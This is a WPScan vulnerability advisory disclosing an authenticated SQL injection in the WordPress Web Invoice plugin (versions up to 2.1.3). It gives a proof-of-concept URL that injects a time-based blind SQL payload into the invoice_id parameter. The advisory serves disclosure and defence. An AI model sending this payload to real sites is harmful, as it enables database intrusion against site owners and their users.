Web Invoice <= 2.1.3 - Authenticated SQLi

WPVDB-ID: 45F43359-98C2-4447-B51B-2D466BAD8261
Published: Dec 12, 2022
Author: Daniel Krohmer
Source: wpscan.com

EPSS

0.001

Percentile

50.4%

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high-privilege users such as admins by default. However, depending on the plugin configuration, other users, such as subscribers, could exploit this as well.

PoC

When logged in with a user allowed to Manage invoice (default admin, but this can be changed via the plugin's settings), open the following URL: https://example.com/wp-admin/admin.php?page=new_web_invoice&invoice_id=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log
